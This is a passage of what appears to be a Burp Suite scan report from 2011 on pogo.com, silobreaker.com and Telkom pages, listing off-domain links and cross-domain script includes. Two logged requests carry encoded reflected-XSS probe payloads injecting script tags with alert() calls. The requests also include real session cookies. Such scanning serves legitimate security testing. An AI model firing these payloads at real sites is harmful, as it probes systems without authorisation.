Cookie: s_pers=%20s_nr%3D1308922657327-New%7C1311514657327%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=F75360B2ABFAB522FEF8F8DD3F1261CB.000208; com.pogo.unid=6618892495612956

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:39:04 GMT
Server: Apache-Coyote/1.1
Content-Length: 12412


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=845147675"></iframe>
...[SNIP]...
18.61. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 12393


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1256050592"></iframe>
...[SNIP]...
18.62. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%25280x0062%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://burp/show/10
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1308922746786-New%7C1311514746786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=90D3F4A69128A7854F9C9566E6366546.000224; com.pogo.unid=6619034229533155

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:39:27 GMT
Server: Apache-Coyote/1.1
Content-Length: 12392


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1669051283"></iframe>
...[SNIP]...
18.63. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922357774-New%7C1311514357774%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:02 GMT
Server: Apache-Coyote/1.1
Content-Length: 12415


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=778675133"></iframe>
...[SNIP]...
18.64. http://www.silobreaker.com/ShowWidget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silobreaker.com
Path:   /ShowWidget.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ShowWidget.aspx?control=MiniHotSpots&Width=300&Height=150&boxed=true&QGHASH0=-483885626&QF2DrillDownItems=16_2264342118916948046 HTTP/1.1
Host: www.silobreaker.com
Proxy-Connection: keep-alive
Referer: http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1308922014.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1106024623.1308922014.1308922014.1308922014.1; __utmc=1; __utmb=1.3.8.1308922022744; __gads=ID=e67454674848fabd:T=1308922022:S=ALNI_MbORhtKYXrcUEikXP4g4B8c3Jncyg

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=6899
Content-Type: text/html; charset=utf-8
Expires: Fri, 24 Jun 2011 15:27:05 GMT
Last-Modified: Fri, 24 Jun 2011 13:27:05 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:32:05 GMT
Content-Length: 3259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
   
...[SNIP]...
</title>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<link href="http://cache.sbstatic.com/UniqueResources/2011617-1370.css" rel="stylesheet" type="text/css" /></head>
...[SNIP]...
</script>


<script src="http://cache.sbstatic.com/UniqueResources/2011617-1370.js" type="text/javascript"></script>
...[SNIP]...
19. Cross-domain script include  previous  next
There are 56 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

19.1. http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://article.wn.com
Path:   /view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/ HTTP/1.1
Host: article.wn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:35 GMT
Server: Apache/2.2.9 (Debian) mod_python/3.3.1 Python/2.5.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 173384

   
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <script type=
...[SNIP]...
<!-- sharethis -->    
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<![endif]-->

<script src="http://www.google.com/jsapi?key=ABQIAAAA-zqZ13My_6vbGFBHqLcRnhSKwOeRfEYp7z6bwvSu4AMfee_gnRR0t2_4hSvbYjk7GnlONQPSbVwJjg"></script>
...[SNIP]...
<meta name="viewport" content="initial-scale=1.0, user-scalable=no" />
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19.2. http://beta.telkom.co.id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:27 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29991
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<!-- $body_off$ -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
19.3. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:06 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 28135
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
</div>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=asepyanm"></script>
...[SNIP]...
19.4. http://beta.telkom.co.id/info-perusahaan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /info-perusahaan/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:29 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 103865
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>Profil
...[SNIP]...
</div>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=asepyanm"></script>
...[SNIP]...
19.5. http://beta.telkom.co.id/pojok-media/artikel-infokom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pojok-media/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:19:33 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29928
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
</div>
